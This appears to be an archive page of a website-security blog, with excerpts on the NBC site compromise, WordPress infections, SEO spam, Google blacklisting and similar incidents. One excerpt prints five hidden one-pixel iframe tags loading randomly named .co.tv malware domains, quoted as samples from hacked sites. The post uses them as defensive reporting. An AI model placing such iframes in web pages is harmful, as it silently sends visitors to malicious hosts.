Protect Your Interwebs!
Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):
*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.
If you are visiting it from Chrome or Firefox would get the following warning:
A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections, it was released yesterday, and it couldn’t have been at a better time. If any one attended WordCamp Las Vegas you might even find some similarities. Fortunately in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.
**Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.
Read More
Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.
Here are some interesting data points:
We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Read More
Even the pro’s are susceptible to attack. Web hosting provider ServerPro has been compromised and completely defaced. This has been ongoing for more than a few days with no resolution.
ServerPro boasts to have over 200,000 clients over a 10 year stand. Although there is no direct proof that this attack affects a wide portion of their client base, we have seen a few of their clients experiencing the same issue.
If you were to visit the site, which we recommend against, you would get the beautiful Google infection banner:
If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.
The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.
Read More
If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here
This is an update to our previous post about Google blacklisting. We have some updated numbers to share.
Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?
Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?
To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.
On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.
That’s it. Let us know if you have any questions or comments.
Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!
We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:
It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.
For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.
However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:
<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>
<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe>
<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>
<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>
<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>
Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.
We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.
What Google is doing is good, but the “war” is not over 
If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.
Vote SPAM For President: New Election Tactics or Same Old Tricks?
The United States presidential campaign is going full force, and it’s been a doozy. We don’t typically get involved with political situations, short of cleaning some of the crazy defacements we see, this is an exception.
This election campaign has brought its typical bashing via commercials, the usual rhetoric we see in interviews, and even those cool vote for (plug in your favorite candidate) stickers. My personal favorite was the vice presidential debate which left me feeling like I was on the grade school playground making faces and sticking my tongue out at the resident bully.
Times have adapted a bit, and the tactics have changed along with the advancements in communications, and social interaction. Twitter discussions boasting crazy statistics, Facebook posts about how awesome each candidate is, all of these have even spawned interesting debate and discussion in my own social groups.
Apparently, the crazy and debatably bad tactics stem beyond the historical mediums into our lovely world of geek. I guess it was only a matter of time.
We have drummed up a couple of theories on how this happened, ultimately it’s up to you to decide. More on that at the end.
Read More